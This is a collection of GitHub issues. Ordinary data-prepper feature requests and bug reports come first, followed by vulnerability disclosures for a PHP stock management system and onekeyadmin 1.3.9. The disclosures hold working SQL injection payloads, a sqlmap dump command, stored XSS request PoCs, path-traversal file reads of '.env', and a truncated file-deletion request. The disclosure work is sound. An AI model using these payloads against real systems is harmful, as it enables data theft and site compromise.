| ------------- | ------------- |
| `s3:GetObject` | The S3 bucket and key path for any object needed |
| `sqs:ReceiveMessage` | The ARN of the SQS queue specified by `sqs.queue_url` |
| `sqs:DeleteMessageBatch` | The ARN of the SQS queue specified by `sqs.queue_url` |
## Possible Future Enhancements
### Direct SNS Notification
The `notification_type` currently only supports SQS. Some teams may want Data Prepper to receive notifications directly from SNS and thus remove the need for an SQS queue.
The `notification_type` could support an `sns` value in the future.
### Additional Codecs
As needed, Data Prepper can support other codecs. Some possible candidates to consider are:
* Multi-line
* JSON List
## Metrics
- messagesReceived (Counter)
- messagesDeleted (Counter)
- messagesFailed (Counter)
- eventsCreated (Counter)
- requestsDuration (Timer)
## Not Included
* This proposal is focused only on reading S3 objects starting with a notification. Thus, any use-case for replay is not part of this scope. Use-cases for reading existing logs are also not covered; these can have their own issues.
* Updated S3 objects are not part of the scope. This work will only support use-cases when a log file is written once.
* Configuration of SQS queue to receive SNS topics should be done externally. Data Prepper will not manage this.
## Tasks
- [x] #1423
- [x] #1424
- [x] #1425
- [x] #1433
- [x] #1434
- [x] #1435
- [x] #1461
- [x] #1462
- [x] #1463
- [x] #1464
- [x] #1501
- [x] ~#1500~ (Not for the initial feature release)
- [x] #1515 | Receive log data from S3 as a Source | https://api.github.com/repos/opensearch-project/data-prepper/issues/251/comments | 12 | 2021-09-06T15:24:24Z | 2022-06-23T12:41:11Z | https://github.com/opensearch-project/data-prepper/issues/251 | 989,276,837 | 251 |
[
"opensearch-project",
"data-prepper"
] | null | Accept data from the Elasticsearch Output Plugins | https://api.github.com/repos/opensearch-project/data-prepper/issues/250/comments | 0 | 2021-09-06T15:23:40Z | 2022-04-19T19:33:54Z | https://github.com/opensearch-project/data-prepper/issues/250 | 989,276,321 | 250 |
[
"opensearch-project",
"data-prepper"
] | Write a source that accepts data from the Logstash OpenSearch output plugin. | Accept data from the Logstash OpenSearch Output Plugin. | https://api.github.com/repos/opensearch-project/data-prepper/issues/249/comments | 0 | 2021-09-06T15:22:56Z | 2022-04-19T19:33:41Z | https://github.com/opensearch-project/data-prepper/issues/249 | 989,275,798 | 249 |
[
"opensearch-project",
"data-prepper"
] | ## Summary
This creates a new Data Prepper source which accepts data in the form of the [OpenSearch Bulk API](https://opensearch.org/docs/latest/api-reference/document-apis/bulk/).
## Configuration
```yaml
source:
opensearch_api:
port: 9200
path_prefix: opensearch/
```
## Operations
The `_bulk` API supports:
* `index`
* `create`
* `update`
* `delete`
This source can do something similar to what the `dynamodb` source does. Specifically it should include the `opensearch_action` metadata.
## Sample
```
POST opensearch/_bulk
{ "index": { "_index": "movies", "_id": "tt1979320" } }
{ "title": "Rush", "year": 2013 }
```
The above request is the simplest case since it is an `index` request.
It creates an Event with data such as:
```
{ "_id": "tt1979320" "title": "Rush", "year": 2013 }
```
Additionally, the event will need metadata that we can use in the `opensearch` sink.
```
opensearch_action: "index"
opensearch_index: "movies"
opensearch_id: "tt1979320"
```
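A minimal sketch of how the source could pair bulk action lines with document lines and attach this metadata (hypothetical helper, not the actual implementation):

```python
import json

def pair_bulk_lines(lines):
    """Pair action lines with document lines from an OpenSearch _bulk body.

    Returns a list of (event, metadata) tuples. 'delete' actions carry no
    document line, so their event body is empty.
    """
    events = []
    i = 0
    while i < len(lines):
        action, params = next(iter(json.loads(lines[i]).items()))
        metadata = {
            "opensearch_action": action,
            "opensearch_index": params.get("_index"),
            "opensearch_id": params.get("_id"),
        }
        i += 1
        event = {}
        if action != "delete":  # delete has no accompanying document
            event = json.loads(lines[i])
            i += 1
        if metadata["opensearch_id"] is not None:
            event["_id"] = metadata["opensearch_id"]
        events.append((event, metadata))
    return events

body = [
    '{ "index": { "_index": "movies", "_id": "tt1979320" } }',
    '{ "title": "Rush", "year": 2013 }',
]
print(pair_bulk_lines(body))
```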
## Query parameters
The `_bulk` API supports a few query parameters. The source should also support most of these and provide some of them as metadata.
* `pipeline` -> Sets metadata: `opensearch_pipeline`
* `routing` -> Sets metadata: `opensearch_routing`
* `timeout` -> Configures an alternate timeout for the request in the source. This probably doesn't need to be provided downstream.
Some other parameters that we may wish to support:
* `refresh`
* `require_alias`
* `wait_for_active_shards`
Finally, we should not support these parameters as they are being deprecated.
* `type`
## Response
Being able to provide the `_bulk` API response may be more challenging. There are a few reasons:
1. Unless end-to-end acknowledgments are enabled, we won't have any knowledge of the writes.
2. Even when acknowledgments are enabled, all the metadata needed in a typical response is still not available.
An initial version could provide responses that either have empty values (where appropriate) or use synthetic values. | OpenSearch Bulk API Source | https://api.github.com/repos/opensearch-project/data-prepper/issues/248/comments | 5 | 2021-09-06T15:20:48Z | 2024-10-11T16:59:25Z | https://github.com/opensearch-project/data-prepper/issues/248 | 989,274,312 | 248 |
[
"opensearch-project",
"data-prepper"
Currently I can't ingest metrics from my Node.js application using the OpenTelemetry Node SDK, because data-prepper does not support it.
It would be great if data-prepper could process the metrics collected by the OpenTelemetry Collector so they can be ingested by OpenSearch.
An issue for this exists on the OpenDistro repo https://github.com/opendistro-for-elasticsearch/data-prepper/issues/669
| Support metrics ingestion | https://api.github.com/repos/opensearch-project/data-prepper/issues/242/comments | 4 | 2021-09-01T15:43:17Z | 2022-05-13T18:29:16Z | https://github.com/opensearch-project/data-prepper/issues/242 | 985,310,456 | 242 |
[
"opensearch-project",
"data-prepper"
] | Add backwards compatibility tests for the plugin to automate end-to-end upgrade paths for faster releases. Developer documentation for implementing bwc tests and hooking them to CI: https://github.com/opensearch-project/opensearch-plugins/blob/main/TESTING.md#backwards-compatibility-testing | Add backwards compatibility tests for automation | https://api.github.com/repos/opensearch-project/data-prepper/issues/200/comments | 7 | 2021-08-23T20:10:31Z | 2021-10-21T17:02:57Z | https://github.com/opensearch-project/data-prepper/issues/200 | 977,390,214 | 200 |
[
"opensearch-project",
"data-prepper"
] | Coming from https://github.com/opensearch-project/.github/issues/21.
The correct copyright for open-source projects in opensearch-project is "Copyright OpenSearch Contributors". Please correct any places that say otherwise, especially where it says copyright Amazon. Make sure NOTICE.txt and README match. See https://github.com/opensearch-project/.github/pull/24 for an example.
| Correct copyright notices to reflect Copyright OpenSearch Contributors | https://api.github.com/repos/opensearch-project/data-prepper/issues/189/comments | 3 | 2021-08-06T17:58:02Z | 2022-01-24T19:02:27Z | https://github.com/opensearch-project/data-prepper/issues/189 | 962,937,800 | 189 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
It would be nice to have a doc that tracks the above compatibility for each release of data-prepper.
| Common docs for Data-Prepper/Elasticsearch/OpenSearch/opentelemetry version compatibility reference | https://api.github.com/repos/opensearch-project/data-prepper/issues/138/comments | 0 | 2021-06-14T16:27:48Z | 2022-04-19T20:28:32Z | https://github.com/opensearch-project/data-prepper/issues/138 | 920,579,347 | 138 |
[
"opensearch-project",
"data-prepper"
] | **Describe the bug**
The `gradlew build` command is failing to produce the output jar. The issue appears to be with the `opensearch` project inside `data-prepper-plugins`. Following is the error:
FAILURE: Build failed with an exception.
* What went wrong:
A problem occurred configuring project ':data-prepper-plugins:opensearch'
> Could not resolve all artifacts for configuration ':data-prepper-plugins:opensearch:classpath'.
> Could not find org.opensearch.gradle:build-tools:1.0.0-alpha2.
Searched in the following locations:
- https://plugins.gradle.org/m2/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
- file:/home/nair/.m2/repository/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
Required by:
project :data-prepper-plugins:opensearch
**To Reproduce**
Steps to reproduce the behavior:
1. Clone the data-prepper repository from github
2. run - ./gradlew build
3. Observe the error message:
Starting a Gradle Daemon, 1 incompatible and 1 stopped Daemons could not be reused, use --status for details
FAILURE: Build failed with an exception.
* What went wrong:
A problem occurred configuring project ':data-prepper-plugins:opensearch'.
> Could not resolve all artifacts for configuration ':data-prepper-plugins:opensearch:classpath'.
> Could not find org.opensearch.gradle:build-tools:1.0.0-alpha2.
Searched in the following locations:
- https://plugins.gradle.org/m2/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
- file:/home/nair/.m2/repository/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
Required by:
project :data-prepper-plugins:opensearch
**Expected behavior**
Jar file is built for the data-prepper-plugins project.
**Screenshots**
Error messages attached above
**Environment (please complete the following information):**
- OS: Ubuntu 20.04 LTS
- Version v1.0.0
**Additional context**
Following comment is included in the build.gradle file.
// TODO: replace local built OpenSearch artifact with the public artifact
| Cannot build the project/jar - Data-prepper-plugins | https://api.github.com/repos/opensearch-project/data-prepper/issues/97/comments | 4 | 2021-05-21T18:44:38Z | 2021-10-12T14:37:57Z | https://github.com/opensearch-project/data-prepper/issues/97 | 898,321,716 | 97 |
[
"opensearch-project",
"data-prepper"
] | **Describe the bug**
Noticed checkstyle errors being ignored in https://github.com/opensearch-project/data-prepper/runs/2442523964#step:7:422; not sure if it's on purpose.
```
Error: [checkstyle] [ERROR] /home/runner/work/data-prepper/data-prepper/data-prepper-plugins/opensearch/src/main/java/com/amazon/dataprepper/plugins/sink/opensearch/IndexStateManagement.java:90: Line is longer than 140 characters (found 143). [LineLength]
```
| Checkstyle errors seem to be ignored | https://api.github.com/repos/opensearch-project/data-prepper/issues/55/comments | 3 | 2021-04-27T15:10:19Z | 2022-06-27T18:50:39Z | https://github.com/opensearch-project/data-prepper/issues/55 | 868,949,762 | 55 |
[
"opensearch-project",
"data-prepper"
] | We will no longer support ODFE < 1.13.0 in OpenSearchSink. This is expected to happen after release 1.0.0.0-beta1. | Remove support for ODFE < 1.13.0 | https://api.github.com/repos/opensearch-project/data-prepper/issues/53/comments | 2 | 2021-04-26T21:41:53Z | 2022-02-21T20:08:03Z | https://github.com/opensearch-project/data-prepper/issues/53 | 868,225,393 | 53 |
[
"HaojianWang",
"cve"
] | # SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Stock Management System in PHP
## Vendor Homepage
+ https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Wang Haojian
## Vulnerable File
+ createBrand.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the `createBrand.php` file of the "Stock Management System" project. The root cause is that the user-supplied `brandName` value is read via `$brandName = $_POST['brandName'];` and used directly in the SQL query without any sanitization or validation. This allows attackers to craft input values that manipulate the SQL query and perform unauthorized operations.
## Vulnerability code snippets
```php
<?php
require_once 'core.php';
$valid['success'] = array('success' => false, 'messages' => array());
if($_POST) {
$brandName = $_POST['brandName'];
$brandStatus = $_POST['brandStatus'];
$sql = "INSERT INTO brands (brand_name, brand_active, brand_status) VALUES ('$brandName', '$brandStatus', 1)";
if($connect->query($sql) === TRUE) {
$valid['success'] = true;
$valid['messages'] = "Successfully Added";
} else {
$valid['success'] = false;
$valid['messages'] = "Error while adding the members";
}
$connect->close();
echo json_encode($valid);
} // /if $_POST
```
+ In the above code, the `brandName` and `brandStatus` values are directly embedded in the SQL query, making it vulnerable to SQL injection attacks
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Stock Management System," Wang Haojian discovered a critical SQL injection vulnerability in the `createBrand.php` file. This vulnerability stems from inadequate validation of user input for the `brandName` parameter, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP)
## Vulnerability location:
+ 'brandName' parameter
## Payload:
```sql
brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1
brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1
```
```makefile
Parameter: brandName (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost/stock/php_action/createBrand.php" --data="brandName=11&brandStatus=1" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs --dump
```
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Prepared statements can prevent SQL injection because they separate SQL code from user input. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
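As an illustration of point 1, here is a minimal parameterized-query sketch in Python with sqlite3 (the project itself uses PHP/mysqli, where `prepare()` and `bind_param()` play the same role):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE brands (brand_name TEXT, brand_status INTEGER, brand_active INTEGER)"
)

def create_brand(conn, brand_name, brand_status):
    # Placeholders keep user input as data; it is never parsed as SQL.
    conn.execute(
        "INSERT INTO brands (brand_name, brand_status, brand_active) VALUES (?, ?, 1)",
        (brand_name, brand_status),
    )

# An injection payload like this is stored literally instead of altering the query.
create_brand(conn, "11' AND (SELECT SLEEP(5)) AND 'a'='a", 1)
rows = conn.execute("SELECT brand_name FROM brands").fetchall()
print(rows)
```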
| SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability | https://api.github.com/repos/HaojianWang/cve/issues/1/comments | 0 | 2024-05-28T04:56:11Z | 2024-05-28T04:56:11Z | https://github.com/HaojianWang/cve/issues/1 | 2,320,120,757 | 1 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#userGroup/index
<img width="1004" alt="image" src="https://user-images.githubusercontent.com/122217858/211449430-48880bb8-a73f-4ff0-b1e7-f3fef5c5876e.png">
PoC:
```
POST /admin1/userGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/userGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","title":"test<img src=1 onerror=alert(\"xss\");>","integral":0,"default":0,"status":1,"theme":"template"}
```
<img width="986" alt="image" src="https://user-images.githubusercontent.com/122217858/211449463-e02099cc-63c1-41c5-af52-ff6d9a29d891.png">
Then you can view the XSS at:
http://192.168.3.129:8091/admin1#userGroup/index
<img width="1010" alt="image" src="https://user-images.githubusercontent.com/122217858/211449494-db258986-7f18-4e94-a537-1687f0680191.png">
| Backstage member grouping - add storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/11/comments | 1 | 2023-01-10T02:40:17Z | 2023-03-20T02:14:48Z | https://github.com/keheying/onekeyadmin/issues/11 | 1,526,667,366 | 11 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#user/index
<img width="1003" alt="image" src="https://user-images.githubusercontent.com/122217858/211449289-c7c83177-343e-4d96-a7dc-bbeb51a09fa1.png">
```
POST /admin1/user/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 532
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/user/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":1,"group_id":73,"nickname":"test<img src=1 onerror=alert(\"xss\");>","sex":0,"email":"cc@cc.com","mobile":"","password":"","cover":"","describe":"","birthday":"2023-01-09","now_integral":0,"history_integral":0,"balance":"0.00","pay_paasword":"","login_ip":"","login_count":0,"login_time":"2023-01-09 22:09:57","update_time":"2023-01-09 22:09:57","create_time":"2023-01-09 22:09:57","status":1,"reason":null,"hide":1,"group_title":"11112","url":"http://192.168.3.129:8091/user/info.html?id=1&theme=template","theme":"template"}
```
Then you can view the XSS at:
http://192.168.3.129:8091/admin1#user/index
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211449350-4ac0a7af-15ef-443e-b690-818412f48394.png">
| Backstage member list - add storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/10/comments | 1 | 2023-01-10T02:38:50Z | 2023-03-20T02:14:11Z | https://github.com/keheying/onekeyadmin/issues/10 | 1,526,666,374 | 10 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#catalog/index
<img width="1007" alt="image" src="https://user-images.githubusercontent.com/122217858/211449085-6515597a-4ad8-4236-8856-0ece625e9aab.png">
PoC:
```
POST /admin1/catalog/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 334
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/catalog/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"cover":"","title":"test<img src=1 onerror=alert(\"xss\");>","pid":0,"show":1,"type":"page","seo_url":"test","bind_html":"","group_id":[],"links_type":0,"links_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo_title":"","seo_keywords":"","seo_description":"","field":[],"theme":"template"}
```
<img width="1017" alt="image" src="https://user-images.githubusercontent.com/122217858/211449133-1af69f4d-dde3-4883-a69e-02bbcf32a07f.png">
Then you can view the XSS at:
http://192.168.3.129:8091/admin1#catalog/index
<img width="986" alt="image" src="https://user-images.githubusercontent.com/122217858/211449169-cee33dc6-bca9-41ee-b291-255532ff2269.png">
| Background category management - adding categories has a storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/9/comments | 1 | 2023-01-10T02:37:38Z | 2023-03-20T02:13:12Z | https://github.com/keheying/onekeyadmin/issues/9 | 1,526,665,614 | 9 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
url
http://192.168.3.129:8091/admin1#admin/index
<img width="990" alt="image" src="https://user-images.githubusercontent.com/122217858/211448923-cc5a1f39-eacc-4087-b7e2-fce1c31c5589.png">
PoC:
```
POST /admin1/admin/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 224
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert(\"xss\");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login_count":"","group_id":1,"password":"aa@xxxqq.com","status":1,"create_time":"","theme":"template"}
```
<img width="1030" alt="image" src="https://user-images.githubusercontent.com/122217858/211448968-fecf17b0-a8de-486d-a996-8460d5c5a55e.png">
Then you can view the XSS at:
http://192.168.3.129:8091/admin1#admin/index
<img width="993" alt="image" src="https://user-images.githubusercontent.com/122217858/211448987-a4e80247-9438-4702-a6d6-dc1659046993.png">
| Background administrator management - Adding an administrator has a storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/8/comments | 1 | 2023-01-10T02:36:01Z | 2023-03-20T02:14:35Z | https://github.com/keheying/onekeyadmin/issues/8 | 1,526,664,640 | 8 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
url
http://192.168.3.129:8091/admin1#adminMenu/index
<img width="923" alt="image" src="https://user-images.githubusercontent.com/122217858/211448785-520621b1-13e7-47ba-8877-dea426ccd218.png">
PoC:
```
POST /admin1/adminMenu/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 145
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminMenu/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","icon":"","title":"test<img src=1 onerror=alert(\"xss\");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}
```
<img width="1006" alt="image" src="https://user-images.githubusercontent.com/122217858/211448829-ae68d2ab-47ad-428b-9194-e79dbeae38ca.png">
Then you can view the XSS at:
http://192.168.3.129:8091/admin1#adminMenu/index
<img width="1008" alt="image" src="https://user-images.githubusercontent.com/122217858/211448853-c849d705-1eb2-44a4-895a-7bffe3bfaad4.png">
| Background menu rules - add menu has storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/7/comments | 1 | 2023-01-10T02:34:44Z | 2023-03-20T02:14:24Z | https://github.com/keheying/onekeyadmin/issues/7 | 1,526,663,841 | 7 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#adminGroup/index
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448666-b9ab1842-811e-439e-9772-736ebd705ae9.png">
PoC:
```
POST /admin1/adminGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 95
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","title":"<img src=1 onerror=alert(\"xss\");>","status":1,"role":[],"theme":"template"}
```
<img width="959" alt="image" src="https://user-images.githubusercontent.com/122217858/211448696-b9b28efb-0a93-44ae-a955-0a3673c32147.png">
Then you can view the XSS at:
http://192.168.3.129:8091/admin1#adminGroup/index
<img width="964" alt="image" src="https://user-images.githubusercontent.com/122217858/211448720-02254b32-8282-4289-9cbb-589d47387ff3.png">
| Background role management - there is a storage xss vulnerability in adding roles | https://api.github.com/repos/keheying/onekeyadmin/issues/6/comments | 1 | 2023-01-10T02:33:30Z | 2023-03-20T02:15:00Z | https://github.com/keheying/onekeyadmin/issues/6 | 1,526,663,021 | 6 |
[
"keheying",
"onekeyadmin"
] |
1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:file reading
4. Vulnerability Details:
Vulnerability location
The vulnerability occurs in the `app\admin\controller\File#download` method, which does not filter the incoming `url` parameter at all, allowing arbitrary file reads.
<img width="982" alt="image" src="https://user-images.githubusercontent.com/122217858/211448532-536eda57-ef0d-4d39-addb-5b7f526760d2.png">
Vulnerability reproduction: read the database configuration file `.env`
```
GET /admin1/file/download?url=../.env&title=英文.png HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
```
<img width="935" alt="image" src="https://user-images.githubusercontent.com/122217858/211448592-f132bba5-1548-438e-bb5c-d65b5fc492c1.png">
| Background arbitrary file reading vulnerability 2 | https://api.github.com/repos/keheying/onekeyadmin/issues/5/comments | 1 | 2023-01-10T02:32:14Z | 2023-03-20T02:12:46Z | https://github.com/keheying/onekeyadmin/issues/5 | 1,526,662,071 | 5 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file reading
Vulnerability Details:
Vulnerability location
In `app\admin\controller\Curd#code`, the `file_get_contents` function is called without any filtering:
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448366-0a317737-9491-4cd6-af6b-9698c4f96784.png">
So we can have the contents of any file we want to read written into `menu.png`, resulting in arbitrary file reads.
Vulnerability recurrence
Here we read the database configuration file .env in the root directory
PoC:
```
POST /admin1/curd/code HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 59
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/curd/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"name":"test","title":"test","cover":"../.env","table":[]}
```
<img width="955" alt="image" src="https://user-images.githubusercontent.com/122217858/211448409-1051109b-f270-4e5b-bdf3-3ef1f4a1554f.png">
You can see that the file contents were successfully written to our `menu.png`, resulting in arbitrary file reads
http://192.168.3.129:8091/plugins/test/menu.png
<img width="882" alt="image" src="https://user-images.githubusercontent.com/122217858/211448439-551b5980-936d-462d-8c14-8728e7032a47.png">
| Background development assistant arbitrary file reading vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/4/comments | 1 | 2023-01-10T02:31:12Z | 2023-03-20T02:15:15Z | https://github.com/keheying/onekeyadmin/issues/4 | 1,526,661,312 | 4 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details:
Vulnerability location
Vulnerability occurs in
app\admin\controller\plugins#delete method
<img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211448184-cbc2f44f-3294-4e15-ac66-8eb9a975ee2d.png">
Here the `delDirAndFile` method of `onekey\File` is called:
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448228-b237bd17-cb4a-4e48-aec5-e4979aaaf313.png">
Vulnerability recurrence
Conditions: background administrator rights
Next I will delete the E:\onekeyadmin-main\public\111\ directory
```
POST /admin1/plugins/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
